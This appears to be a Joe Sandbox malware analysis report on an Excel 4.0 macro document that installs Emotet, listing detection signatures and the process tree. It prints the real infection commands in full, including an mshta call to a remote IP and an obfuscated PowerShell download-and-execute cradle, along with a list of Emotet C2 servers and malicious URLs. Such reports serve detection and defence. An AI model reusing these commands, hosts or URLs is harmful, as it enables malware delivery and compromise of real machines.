Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
opastonline.com.xls

Overview

General Information

Sample Name:opastonline.com.xls
Analysis ID:562504
MD5:e42ac962bed3fc210b24f8a87161e9b3
SHA1:0c5bbeb25cd544993acefbc3041b23f99a56a7d5
SHA256:601121c30531ce26c85a232f1e76df6a0eec591296ff711d45912db421d67a10
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1308 cmdline: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2204 cmdline: mshta http://91.240.118.172/cc/vv/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2856 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2152 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
SourceRuleDescriptionAuthorStrings
opastonline.com.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15310:$s1: Excel
  • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
opastonline.com.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\opastonline.com.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x142a2:$s1: Excel
    • 0x15310:$s1: Excel
    • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\opastonline.com.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\JooSee.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        SourceRuleDescriptionAuthorStrings
        0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 51 entries
                  SourceRuleDescriptionAuthorStrings
                  12.2.rundll32.exe.2d0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    13.2.rundll32.exe.9c0000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      11.2.rundll32.exe.31f0000.16.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        11.2.rundll32.exe.3280000.17.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          13.2.rundll32.exe.2bd0000.14.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 77 entries

                            System Summary

                            barindex
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2204, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2204, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2792
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ProcessCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 2204
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2308, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 1308
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2204, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2792
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2204, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2792
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2204, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2792

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3Avira URL Cloud: Label: phishing
                            Source: http://ancyh.xyzAvira URL Cloud: Label: malware
                            Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3Avira URL Cloud: Label: malware
                            Source: http://sep.dfwsolar.club/hzh3v/zAvira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3Avira URL Cloud: Label: malware
                            Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/Avira URL Cloud: Label: malware
                            Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/Avira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-contAvira URL Cloud: Label: malware
                            Source: http://ancyh.xyz/assets/Pcxv1k5/PE3Avira URL Cloud: Label: malware
                            Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/cc/vv/fe.pngAvira URL Cloud: Label: malware
                            Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3Avira URL Cloud: Label: malware
                            Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/Avira URL Cloud: Label: phishing
                            Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/Avira URL Cloud: Label: malware
                            Source: http://michaelcrompton.co.uk/wp-admin/G/PE3Avira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6zAvira URL Cloud: Label: phishing
                            Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/Avira URL Cloud: Label: malware
                            Source: http://ancyh.xyz/assets/Pcxv1k5/Avira URL Cloud: Label: malware
                            Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3Avira URL Cloud: Label: malware
                            Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/Avira URL Cloud: Label: malware
                            Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3Avira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/Avira URL Cloud: Label: malware
                            Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3Avira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3Avira URL Cloud: Label: malware
                            Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3Avira URL Cloud: Label: malware
                            Source: http://michaelcrompton.co.uk/wp-admin/G/Avira URL Cloud: Label: malware
                            Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3Avira URL Cloud: Label: malware
                            Source: http://chupahfashion.com/eh6bwxkAvira URL Cloud: Label: malware
                            Source: http://91.240.118.172/cc/vv/fe.htmlAvira URL Cloud: Label: malware
                            Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/Avira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/Avira URL Cloud: Label: malware
